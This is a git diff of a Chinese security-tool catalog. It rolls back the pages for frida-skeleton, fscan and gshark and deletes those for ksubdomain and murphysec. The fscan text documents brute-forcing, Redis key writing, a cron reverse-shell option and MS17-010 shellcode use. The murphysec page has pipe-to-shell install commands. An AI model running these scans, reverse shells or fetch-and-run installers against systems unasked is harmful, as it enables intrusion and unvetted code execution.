-- -k 选项添加 CDK- 添加 -yakit 选项- 添加 -py310 选项- 添加 -oraclejdk11 选项- 添加 -docker 选项 (安装docker)- 添加 -code 选项 (安装 code-server)  
-
-**功能修改与优化**  
-- bat 换成兼容更强的安装包- 目前 -py3(7/8/9/10) 选项调用 pyenv 进行 python3 版本的切换,无需重复安装- 目前 -oraclejdk(8/11) 选项调用 jenv 进行 java 版本的切换,无需重复安装  
-
-**错误修复**  
-- 修改一些拼写错误
-
-#### [v1.6.0] - 2022-03-11
-
-**兼容性**  
-- 支持 linux arm 架构  
-- 支持 kali 2022.1  
-
-**功能添加**  
-- -k 选项添加 netspy  
-- -f 选项添加 duf/procs/ncdu/exa/htop/bat/fd  
-
-**错误修复**  
-- 修复更改py版本时没有更改环境变量的问题
-
-#### [v1.5.9] - 2021-12-10
-
-**功能添加**  
-- k 选项添加 htpwdScan,WebCrack,ysomap,sttr  
-
-**功能修改与优化**  
-- git clone 加入 --depth 1
-
-#### [v1.5.8] - 2021-11-12
+#### [v1.5.6] - 2021-10-03
+**功能修改**  
+- 更新 crawlergo 的下载链接  
+- 更改显示语言 #10 #11  
+- 在安装 volatility3 时默认不会下载 Symbol Tables  
+- 优化对已安装软件的检测,尽量避免重复安装  
+- 修改一个重命名的bug  
+- 移除 sharry 的安装选项  
 
-**功能修改与优化**  
-- 兼容 Ubuntu 21.10 impish  
-- 兼容 AlmaLinux  
-- 兼容 Fedora 35  
-- 兼容 CentOS 8 Stream  
-- 兼容 VzLinux  
-- 兼容 Rocky  
-- python3 选项改为 -py3(7/8/9)  
-- python2 选项改为 -py2
 
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/frida-skeleton.md b/detail/frida-skeleton.md
index 4dfe8c0d3..f4445586f 100644
--- a/detail/frida-skeleton.md
+++ b/detail/frida-skeleton.md
@@ -3,7 +3,7 @@
 ![Language](https://img.shields.io/badge/Language-Python-blue)
 ![Author](https://img.shields.io/badge/Author-Margular-orange)
 ![GitHub stars](https://img.shields.io/github/stars/Margular/frida-skeleton.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V3.3-red)
+![Version](https://img.shields.io/badge/Version-V2.0.0-red)
 ![Time](https://img.shields.io/badge/Join-20201221-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
@@ -90,40 +90,4 @@ python frida-skeleton.py -h
 
 ## 最近更新
 
-#### [v3.3] - 2022-12-10
-
-**Add**  
-- 新增--no-root选项，有的设备不支持adb root  
-- frida-server使用随机端口绕过常规检测  
-- 在初始化FridaThread时校验设备是否root  
-
-**Changed**  
-- 使用enumerate_applications替换enumerate_processes  
-
-**Fixed**  
-- 修复有的su不支持后面跟一个-  
-- attrdict本地模块化以兼容3.10及以上版本
-
-#### [v3.2.3] - 2021-06-24
-
-**Add**  
-- 保存hook脚本的整个内容方便调试和查看  
-
-**Changed**  
-- 在调用Trace.javaClassByRegex的时候默认跳过hook系统函数  
-
-**Fixed**  
-- 修复可能无法退出程序的BUG
-
-#### [v3.2.0] - 2020-12-24
-
-**Add**  
-- 新增Jav.describeObject API，很方便地打印java对象的函数和字段信息  
-- 加入星链计划2.0  
-- 添加logo  
-
-**Changed**  
-- 迁移wiki到github  
-- 主程序帮助界面改为中文
-
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/fscan.md b/detail/fscan.md
index 7eac25595..328078ede 100644
--- a/detail/fscan.md
+++ b/detail/fscan.md
@@ -3,10 +3,11 @@
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![Author](https://img.shields.io/badge/Author-shadow1ng-orange)
 ![GitHub stars](https://img.shields.io/github/stars/shadow1ng/fscan.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.8.2-red)
+![Version](https://img.shields.io/badge/Version-V1.6.3-red)
 ![Time](https://img.shields.io/badge/Join-20210422-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
+
 # 简介
 一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。   
 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
@@ -17,8 +18,8 @@
 * 端口扫描
 
 2.爆破功能:
-* 各类服务爆破(ssh、smb、rdp等)
-* 数据库密码爆破(mysql、mssql、redis、psql、oracle等)  
+* 各类服务爆破(ssh、smb等)
+* 数据库密码爆破(mysql、mssql、redis、psql等)  
 
 3.系统信息、漏洞扫描:  
 * netbios探测、域控识别  
@@ -31,9 +32,8 @@
 * web漏洞扫描(weblogic、st2等,支持xray的poc)
 
 5.漏洞利用:
-* redis写公钥或写计划任务  
-* ssh命令执行  
-* ms17017利用(植入shellcode),如添加用户等  
+* redis写公钥或写计划任务
+* ssh命令执行
 
 6.其他功能:
 * 文件保存
@@ -59,10 +59,6 @@ fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
 fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
 fscan.exe -hf ip.txt  (以文件导入)
 fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
-fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
-fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
-fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080
-fscan.exe -h 192.168.1.1/24 -m ms17017 -sc add (可在ms17010-exp.go自定义shellcode,内置添加用户等功能)
 ```
 编译命令
 ```
@@ -71,84 +67,60 @@ go build -ldflags="-s -w " -trimpath
 
 完整参数
 ```
+   -Num int
+        poc rate (default 20)
   -c string
-        ssh命令执行
+        exec command (ssh)
   -cookie string
-        设置cookie
-  -debug int
-        多久没响应,就打印当前进度(default 60)
+        set poc cookie
+  -debug
+        debug mode will print more error info
   -domain string
-        smb爆破模块时,设置域名
+        smb domain
   -h string
-        目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
+        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
   -hf string
-        读取文件中的目标
-  -hn string
-        扫描时,要跳过的ip: -hn 192.168.1.1/24
+        host file, -hs ip.txt
   -m string
-        设置扫描模式: -m ssh (default "all")
+        Select scan type ,as: -m ssh (default "all")
   -no
-        扫描结果不保存到文件中
-  -nobr
-        跳过sql、ftp、ssh等的密码爆破
+        not to save output log
   -nopoc
-        跳过web poc扫描
+        not to scan web vul
   -np
-        跳过存活探测
-  -num int
-        web poc 发包速率  (default 20)
+        not to ping
   -o string
-        扫描结果保存到哪 (default "result.txt")
+        Outputfile (default "result.txt")
   -p string
-        设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-  -pa string
-        新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
-  -path string
-        fcgi、smb romote file path
+        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")
   -ping
-        使用ping代替icmp进行存活探测
-  -pn string
-        扫描时要跳过的端口,as: -pn 445
+        using ping replace icmp
   -pocname string
-        指定web poc的模糊名字, -pocname weblogic
+        use the pocs these contain pocname, -pocname weblogic
   -proxy string
-        设置代理, -proxy http://127.0.0.1:8080
-  -user string
-        指定爆破时的用户名
-  -userf string
-        指定爆破时的用户名文件
+        set poc proxy, -proxy http://127.0.0.1:8080
   -pwd string
-        指定爆破时的密码
+        password
   -pwdf string
-        指定爆破时的密码文件
+        password file
   -rf string
-        指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
+        redis file to write sshkey file (as: -rf id_rsa.pub)
   -rs string
-        redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
-  -silent
-        静默扫描,适合cs扫描时不回显
-  -sshkey string
-        ssh连接时,指定ssh私钥
+        redis shell to write cron file (as: -rs 192.168.1.1:6666)
   -t int
-        扫描线程 (default 600)
+        Thread nums (default 600)
   -time int
-        端口扫描超时时间 (default 3)
+        Set timeout (default 3)
   -u string
-        指定Url扫描
+        url
   -uf string
-        指定Url文件扫描
+        urlfile
+  -user string
+        username
+  -userf string
+        username file
   -wt int
-        web访问超时时间 (default 5)
-  -pocpath string
-        指定poc路径
-  -usera string
-        在原有用户字典基础上,新增新用户
-  -pwda string
-        在原有密码字典基础上,增加新密码
-  -socks5
-        指定socks5代理 (as: -socks5  socks5://127.0.0.1:1080)
-  -sc 
-        指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)
+        Set web timeout (default 5)
 ```
 
 ## 运行截图
@@ -173,44 +145,10 @@ go build -ldflags="-s -w " -trimpath
 `go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)`
 ![](https://github.com/shadow1ng/fscan/raw/main/image/netbios1.png)
 
-`go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)`
-![img.png](https://github.com/shadow1ng/fscan/raw/main/image/live.png)
-
-
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2022-12-09 发布演示视频[404星链计划开源安全工具演示——fscan](https://www.bilibili.com/video/BV1Cv4y1R72M/)
 
 ## 最近更新
 
-#### [v1.8.2] - 2022-11-19
-
-**更新**  
-- 新增 hash 碰撞  
-- 新增 wmiiexec 无回显命令执行
-
-#### [v1.8.1] - 2022-07-06
-
-**更新**  
-- 加入手工gc回收,尝试节省无用内存  
-- -url 支持逗号隔开  
-- 修复一个poc模块bug
-
-#### [v1.8.0] - 2022-07-02
-
-**更新**  
-- 加强poc fuzz模块,支持跑备份文件、目录、shiro-key等  
-- 新增ms17017利用,可在ms17010-exp.go自定义shellcode,内置添加用户等功能  
-- 新增poc、指纹  
-- 支持socks5代理  
-- 因body指纹更全,默认不再跑ico图标
-
-#### [v1.7.1] - 2022-04-20
-
-**更新**  
-- poc模块现加入指定目录或文件  
-- 端口可指定文件  
-- rdp加入多线程爆破(demo)
-
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/gshark.md b/detail/gshark.md
index 719929eed..0f7598748 100644
--- a/detail/gshark.md
+++ b/detail/gshark.md
@@ -1,38 +1,33 @@
-## GShark <https://github.com/madneal/gshark>
+## gshark <https://github.com/madneal/gshark>
 <!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![Author](https://img.shields.io/badge/Author-madneal-orange)
 ![GitHub stars](https://img.shields.io/github/stars/madneal/gshark.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.2.0-red)
+![Version](https://img.shields.io/badge/Version-V0.8.4-red)
 ![Time](https://img.shields.io/badge/Join-20201221-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
-中文 | [英文](README.md)
-<p align="center">
-   <img alt="GgShark logo" src="https://s1.ax1x.com/2018/10/17/idhZvj.png" />
-   <h3 align="center">GShark</h3>
-   <p align="center">Scan for sensitive information easily and effectively.</p>
-</p>
 
 # GShark [![Go Report Card](https://goreportcard.com/badge/github.com/madneal/gshark)](https://goreportcard.com/report/github.com/madneal/gshark)   
 
-项目基于 Go 以及 Vue 搭建的敏感信息检测管理系统。关于的完整介绍请参考[这里](https://mp.weixin.qq.com/s/Yoo1DdC2lCtqOMAreF9K0w)。
+The project is based on go with vue to build a management system for sensitive information detection. This is the total fresh version, you can refer the [old version](https://github.com/madneal/gshark/blob/gin/OLD_README.md) here. For the full introduction of the new version, please refer [here](https://mp.weixin.qq.com/s/Yoo1DdC2lCtqOMAreF9K0w).
 
-# 特性
 
-* 支持多个搜索平台，包括 Github，Gitlab（不稳定支持），Searchcode
-* 灵活的菜单以及 API 权限管理
-* 灵活的规则以及过滤规则设置
-* 支持 gobuster 作为子域名爆破的支持
-* 方便易用
+# Features
 
-# 快速开始
+* Support multi platform, including Gitlab, Github, Searchcode
+* Flexible menu and API permission setting
+* Flexible rules and filter rules
+* Utilize gobuster to brute force subdomain
+* Easily used management system
+
+# Quick start
 
 ![GShark](https://user-images.githubusercontent.com/12164075/114326875-58e1da80-9b69-11eb-82a5-b2e3751a2304.png)
 
-## 部署
+## Deployment
 
-建议通过 nginx 部署前端项目。 将 `dist` 文件夹放在 `/var/www/html`下，修改 `nginx.conf` 来反向代理后端服务。在[bilibili](https://www.bilibili.com/video/BV1Py4y1s7ap/) 和 [youtube](https://youtu.be/bFrKm5t4M54) 可以参考部署视频教程。 Windows 下的部署请参考[这里](https://www.bilibili.com/video/BV1CA411L7ux/)。
+For the deployment, it's suggested to install nginx. Place the `dist` folder under `html`, modify the `nginx.conf` to reverse proxy the backend service. I have also made a video for the deployment in [bilibili](https://www.bilibili.com/video/BV1Py4y1s7ap/) and [youtube](https://youtu.be/bFrKm5t4M54). For the deploment in windows, refer [here](https://www.bilibili.com/video/BV1CA411L7ux/).
 
 ```
 location /api/ {
@@ -45,23 +40,23 @@ proxy_pass http://127.0.0.1:8888;
 }
 ```
 
-部署工作非常简单。 从 [releases](https://github.com/madneal/gshark/releases) 中找到对应的版本 zip 文件。 解压后得将 `dist` 中的文件复制到  `/var/www/html` 文件夹中。
+The deployment work is very easy. Find the corresponding binary zip file from [releases](https://github.com/madneal/gshark/releases). Unzip and run. Remember to copy the files inside `dist` to `html` folder of nginx.
 
-### Web 服务
+### Web service
 
 ```
 ./gshark web
 ```
 
-### 扫描服务
+### Scan service
 
 ```
 ./gshark scan
 ```
 
-## 开发
+## Development
 
-### 服务端
+### Server side
 
 ``` 
 git clone https://github.com/madneal/gshark.git
@@ -77,7 +72,7 @@ go build
 ./gshark web
 ```
 
-启动扫描服务：
+If you want to set up the scan service, please run:
 
 ```
 ./gshark scan
@@ -85,7 +80,7 @@ go build
 
 
 
-### Web 端
+### Web side
 
 ```
 cd ../web
@@ -95,7 +90,7 @@ npm install
 npm run serve
 ```
 
-## 运行
+## Run
 
 ```
 USAGE:
@@ -115,86 +110,16 @@ GLOBAL OPTIONS:
    --version, -v           print the version
 ```
 
-### 添加 Token
+### Add Token
 
-执行扫描任务需要在 Github 的 Github token。你可以在 [tokens](https://github.com/settings/tokens) 中生成令牌，只需要 public_repo 的读权限即可。对于 Gitlab 扫描，请记得添加令牌。
+To execute `./gshark scan`, you need to add a Github token for crawl information in github. You can generate a token in [tokens](https://github.com/settings/tokens). Most access scopes are enough. For Gitlab search, remember to add token too.
 
 [![iR2TMt.md.png](https://s1.ax1x.com/2018/10/31/iR2TMt.md.png)](https://imgchr.com/i/iR2TMt)
 
-## FAQ
-
-1. 默认登录的用户名密码（**及时修改**）：
-
-gshark/gshark
-
-2. 数据库初始化失败
-
-确保数据库 mysql 版本高于 5.6。如果是第二次初始化的时候记得移除第一次初始化产生的实例。
-
-3. `go get ./... connection error`
-
-[使用 GOPROXY](https://madneal.com/post/gproxy/:
-
-```
-go env -w GOPROXY=https://goproxy.cn,direct
-go env -w GO111MODULE=on
-```
-4. 部署前端项目后，页面空白
-
-尝试清除 LocalStorage
-
-
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2021-11-12 发布文章[《GShark:多平台的敏感信息监测工具》](https://mp.weixin.qq.com/s/MG1lxiFg4a8KkAdhSMOu3Q)
 
 ## 最近更新
 
-#### [v1.2.0] - 2023-08-06
-
-**更新**  
-- 任务无需通过命令行启动  
-- 通过 Web 直接管理扫描任务
-
-#### [v1.1.4] - 2023-02-15
-
-**Fixed**  
-- 修复无法变更规则状态的问题  
-- 增加新增 token 的 postman 类型  
-
-**Added**  
-- 增加 startSecFilterTask 以及 getTaskStatus API 权限初始化
-
-#### [v1.1.3] - 2023-01-31
-
-**Fixed**  
-- 修复变更规则错误的问题  
-- 修复搜索代码结果错误的问题  
-
-**Added**  
-- 增加 switchRuleStatus 权限初始化  
-- github client 初始化增加 httpcache
-
-#### [v1.1.2] - 2023-01-18
-
-**Fixed**  
-- 修复执行过滤任务时未成功忽略仓库的问题  
-- 修复 deleted_at 字段造成的初始化失败的问题  
-- 修复字段问题导致忽略单个结果失败的问题  
-
-**Added**  
-- 增加仅展示二次过滤的结果  
-- 增加 getTaskStatus API 权限初始化
-
-#### [v1.1.1] - 2023-01-16
-
-**Mofified**  
-- 修改日志时间格式  
-
-**Fixed**  
-- 修复前端变更过滤规则问题  
-- 修改忽略仓库状态的问题  
-- 修复 filter_type 黑白名单问题
-
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/ksubdomain.md b/detail/ksubdomain.md
deleted file mode 100644
index 920c533f3..000000000
--- a/detail/ksubdomain.md
+++ /dev/null
@@ -1,188 +0,0 @@
-## ksubdomain <https://github.com/boy-hack/ksubdomain>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![Author](https://img.shields.io/badge/Author-w8ay-orange)
-![GitHub stars](https://img.shields.io/github/stars/boy-hack/ksubdomain.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.9.5-red)
-![Time](https://img.shields.io/badge/Join-20200821-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-ksubdomain是一款基于无状态的子域名爆破工具，类似无状态端口扫描，支持在Windows/Linux/Mac上进行快速的DNS爆破，拥有重发机制不用担心漏包。
-
-hacking8信息流的src资产收集 https://i.hacking8.com/src/ 用的是ksubdomain
-
-![](https://github.com/boy-hack/ksubdomain/raw/main/image.gif)
-## 安装
-1. 下载二进制 https://github.com/boy-hack/ksubdomain/releases
-2. 安装libpcap环境
-   - Windows
-     下载`winpcap`驱动:https://www.winpcap.org/install/default.htm
-   - Linux
-     已经静态编译打包libpcap，无需其他操作
-   - MacOS
-     自带libpcap,无需其他操作
-3. 执行!
-
-## Useage
-```bash
-NAME:
-   KSubdomain - 无状态子域名爆破工具
-
-USAGE:
-   ksubdomain [global options] command [command options] [arguments...]
-
-VERSION:
-   1.4
-
-COMMANDS:
-   enum, e    枚举域名
-   verify, v  验证模式
-   test       测试本地网卡的最大发送速度
-   help, h    Shows a list of commands or help for one command
-
-GLOBAL OPTIONS:
-   --help, -h     show help (default: false)
-   --version, -v  print the version (default: false)
-
-```
-
-### 模式
-
-**验证模式**
-提供完整的域名列表，ksubdomain负责快速获取结果
-
-```bash
-./ksubdomain verify -h
-
-NAME:
-   cmd verify - 验证模式
-
-USAGE:
-   cmd verify [command options] [arguments...]
-
-OPTIONS:
-   --filename value, -f value   验证域名文件路径
-   --band value, -b value       宽带的下行速度，可以5M,5K,5G (default: "2m")
-   --resolvers value, -r value  dns服务器文件路径，一行一个dns地址
-   --output value, -o value     输出文件名
-   --silent                     使用后屏幕将仅输出域名 (default: false)
-   --retry value                重试次数,当为-1时将一直重试 (default: 3)
-   --timeout value              超时时间 (default: 6)
-   --stdin                      接受stdin输入 (default: false)
-   --only-domain, --od          只打印域名，不显示ip (default: false)
-   --not-print, --np            不打印域名结果 (default: false)
-   --help, -h                   show help (default: false)
-```
-
-```
-从文件读取 
-./ksubdomain v -f dict.txt
-
-从stdin读取
-echo "www.hacking8.com"|./ksubdomain v --stdin
-```
-
-**枚举模式**
-只提供一级域名，指定域名字典或使用ksubdomain内置字典，枚举所有二级域名
-
-```bash
-./ksubdomain enum -h
-
-NAME:
-   cmd enum - 枚举域名
-
-USAGE:
-   cmd enum [command options] [arguments...]
-
-OPTIONS:
-   --band value, -b value          宽带的下行速度，可以5M,5K,5G (default: "2m")
-   --resolvers value, -r value     dns服务器文件路径，一行一个dns地址
-   --output value, -o value        输出文件名
-   --silent                        使用后屏幕将仅输出域名 (default: false)
-   --retry value                   重试次数,当为-1时将一直重试 (default: 3)
-   --timeout value                 超时时间 (default: 6)
-   --stdin                         接受stdin输入 (default: false)
-   --only-domain, --od             只打印域名，不显示ip (default: false)
-   --not-print, --np               不打印域名结果 (default: false)
-   --domain value, -d value        爆破的域名
-   --domainList value, --dl value  从文件中指定域名
-   --filename value, -f value      字典路径
-   --skip-wild                     跳过泛解析域名 (default: false)
-   --level value, -l value         枚举几级域名，默认为2，二级域名 (default: 2)
-   --level-dict value, --ld value  枚举多级域名的字典文件，当level大于2时候使用，不填则会默认
-   --help, -h                      show help (default: false)
-```
-
-```
-./ksubdomain e -d baidu.com
-
-从stdin获取
-echo "baidu.com"|./ksubdomain e --stdin
-```
-
-## 特性和Tips
-
-- 无状态爆破，有失败重发机制，速度极快
-- 中文帮助，-h会看到中文帮助
-- 两种模式，枚举模式和验证模式，枚举模式内置10w字典
-- 将网络参数简化为了-b参数，输入你的网络下载速度如-b 5m，将会自动限制网卡发包速度。
-- 可以使用./ksubdomain test来测试本地最大发包数
-- 获取网卡改为了全自动并可以根据配置文件读取。
-- 会有一个时时的进度条，依次显示成功/发送/队列/接收/失败/耗时 信息。
-- 不同规模的数据，调整 --retry --timeout参数即可获得最优效果
-- 当--retry为-1，将会一直重试直到所有成功。
-
-## 与massdns、dnsx对比
-
-使用100w字典，在4H5M的网络环境下测试
-
-|          | ksubdomain                                                   | massdns                                                      | dnsx                                                         |
-| -------- | ------------------------------------------------------------ | ------------------------------------------------------------ | ------------------------------------------------------------ |
-| 支持系统 | Windows/Linux/Darwin                                         | Windows/Linux/Darwin                                         | Windows/Linux/Darwin                                         |
-| 功能 | 支持验证和枚举 | 只能验证 | 只能验证 |
-| 发包方式 | pcap网卡发包                                                 | epoll,pcap,socket                                            | socket                                                       |
-| 命令行 | time ./ksubdomain v -b 5m -f d2.txt -o ksubdomain.txt -r dns.txt --retry 3 --np | time ./massdns -r dns.txt -t AAAA -w massdns.txt d2.txt --root -o L | time ./dnsx -a -o dnsx.txt -r dns.txt -l d2.txt -retry 3 -t 5000 |
-| 备注   | 加了--np 防止打印过多                                        |                                                              |                                                              |
-| 结果   | 耗时:1m28.273s<br />成功个数:1397                            | 耗时:3m29.337s<br />成功个数:1396                            | 耗时:5m26.780s <br />成功个数:1396                           |
-
-ksubdomain只需要1分半，速度远远比massdns、dnsx快~
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2020-09-02 发布文章[《ksubdomain 无状态域名爆破工具》](https://paper.seebug.org/1325/)
-- 2019-10-12 发布文章[《从 Masscan, Zmap 源码分析到开发实践》](https://paper.seebug.org/1052/)
-
-## 最近更新
-
-#### [v1.9.5] - 2022-03-31
-
-**更新**  
-- 增加suffix domain指定特定dns的提示  
-- 修复verify模式计算域名总量错误
-
-#### [v1.9.3] - 2022-03-24
-
-**更新**  
-- 增加编程接口，ksubdomain可作为一个库封装  
-- enum模式加入--ns参数，用于添加特定dns  
-- 修复域名太多时扫描卡住的问题  
-
-
-#### [v1.8.5] - 2022-03-06
-
-**优化**  
-- 修复高并发下出现的一处内存拷贝问题  
-- 优化泛解析时的错误处理
-
-#### [v1.8.1] - 2022-02-13
-
-**重构**  
-- 优化了代码结构，优化了go协程组织方式，代码易懂，解决了一些冲突问题  
-- 设计了一种新的算法，用来快速发包并且大大减少失败率  
-- 获取网卡改为了全自动并可以根据配置文件读取  
-- 增加有一个实时的进度条，依次显示成功/发送/队列/接收/失败/耗时信息
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/murphysec.md b/detail/murphysec.md
deleted file mode 100644
index dac24ea8c..000000000
--- a/detail/murphysec.md
+++ /dev/null
@@ -1,288 +0,0 @@
-## murphysec <https://github.com/murphysecurity/murphysec>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![Author](https://img.shields.io/badge/Author-murphysecurity-orange)
-![GitHub stars](https://img.shields.io/github/stars/murphysecurity/murphysec.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.10.0-red)
-![Time](https://img.shields.io/badge/Join-20220914-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-中文 | [EN](https://github.com/murphysecurity/murphysec/blob/v3/README.md)
-
-墨菲安全的 **CLI 工具**，用于在命令行检测指定目录代码的依赖安全问题，也可以基于 CLI 工具实现在 CI 流程的检测。
-
-## 功能
-1. 分析项目使用的依赖信息，包含直接和间接依赖
-2. 检测项目依赖存在的已知漏洞信息
-
-
-### 效果截图
-
-- CLI 运行结果
-
-  <img alt="cli output" src="https://github.com/murphysecurity/murphysec/raw/v3/assets/cli.png" width="80%">
-
-- 检测结果页面
-
-  <img alt="scan result" src="https://github.com/murphysecurity/murphysec/raw/v3/assets/scan-result.png" width="80%">
-  
-  <img alt="scan result" src="https://github.com/murphysecurity/murphysec/raw/v3/assets/scan-detail-result.png" width="80%">
-
-## 目录
-
-1. [支持的语言](#支持的语言)
-2. [工作原理](#工作原理)
-3. [使用场景](#使用场景)
-4. [使用步骤](#使用步骤)
-5. [命令介绍](#命令介绍)
-6. [交流和问题反馈](#交流和问题反馈)
-7. [开源协议](#开源协议)
-
-## 支持的语言
-
-目前支持 Java、JavaScript、Golang、Python、PHP、C#、Ruby、Objective-C、.NET 语言项目的检测，后续会逐渐支持其他的开发语言。
-
-<table>
- <tr>
-     <th>语言</th>
-     <th>包管理工具</th>
-     <th>所需文件</th>
- </tr>
- <tr >
-     <td rowspan="2">Java</td>
-     <td>Maven</td>
-      <td>pom.xml</td>
-
- </tr>
- <tr>
-     <td>Gradle</td>
-    <td>build.gradle, build.gradle.kts</td>
-
- </tr>
-
-  <tr >
-     <td>Go</td>
-     <td>Go Modules</td>
-      <td>go.mod</td>
-
- </tr>
-
-  <tr >
-     <td rowspan="2">JavaScript</td>
-     <td>NPM</td>
-    <td>package.json, package-lock.json</td>
-
- </tr>
- <tr>
-     <td>Yarn</td>
-    <td>yarn.lock, package.json</td>
-
-
-  <tr >
-     <td rowspan="2">Python</td>
-     <td>pip</td>
-    <td>requirements.txt</td>
-
- </tr>
- <tr>
-     <td>Poetry</td>
-    <td>poetry.lock</td>
-
-  <tr >
-     <td>PHP</td>
-     <td>Composer</td>
-      <td>composer.lock</td>
-
- </tr>
-
-  <tr >
-     <td>Ruby</td>
-     <td>Bundler</td>
-      <td>Gemfile.lock, gems.locked</td>
-
- </tr>
-   <tr >
-     <td>.NET</td>
-     <td>NuGet</td>
-      <td>packages.lock.json</td>
-
- </tr>
-   <tr >
-     <td>C#</td>
-     <td>NuGet</td>
-      <td>packages.lock.json</td>
-
- </tr>
-
-   <tr >
-     <td>Objective-C</td>
-     <td>Cocoapods</td>
-      <td>Podfile.lock</td>
-
- </tr>
-
-</table>
-
-详细的支持情况可以[查看文档](https://www.murphysec.com/docs/quick-start/language-support/)
-
-## 工作原理
-
-1. 对于使用不同语言/包管理工具的项目，墨菲安全的 CLI 工具主要采用`项目构建`或直接对`包管理文件`进行解析的方式，来准确获取到项目的依赖信息
-2. 项目的依赖信息会上传到服务端，并基于墨菲安全持续维护的`漏洞知识库`来识别项目中存在安全缺陷的依赖
-
-![cli-flowchart](https://github.com/murphysecurity/murphysec/raw/v3/assets/flowchart.png)
-
-> 说明：CLI 工具只会将检测项目的依赖和基本信息发送到墨菲安全服务端，用于识别存在安全缺陷的依赖，不会上传任何本地代码。
-
-
-## 使用场景
-1. 希望在本地环境中检测代码文件
-2. 希望集成到 CI 环境中对代码项目进行检测
-
-参考：[墨菲安全 CLI 与 Jenkins CI 的集成](https://www.murphysec.com/docs/integrations/jenkins/)
-
-
-
-## 使用步骤
-### 1. 安装
-
-访问 [GitHub Releases](https://github.com/murphysecurity/murphysec/releases/latest) 页面下载最新版本的墨菲安全 CLI，或执行以下相关命令：
-
-#### 在 Linux 上安装
-
-```
-wget -q https://s.murphysec.com/install.sh -O - | /bin/bash
-```
-
-#### 在 OSX 上安装
-
-```
-curl -fsSL https://s.murphysec.com/install.sh | /bin/bash
-```
-
-#### 在 WINDOWS 上安装
-
-```
-powershell -Command "iwr -useb https://s.murphysec.com/install.ps1 | iex"
-```
-
-### 2.创建任务
-
-首先登录到墨菲安全控制台，创建任务的方式有以下三种
-
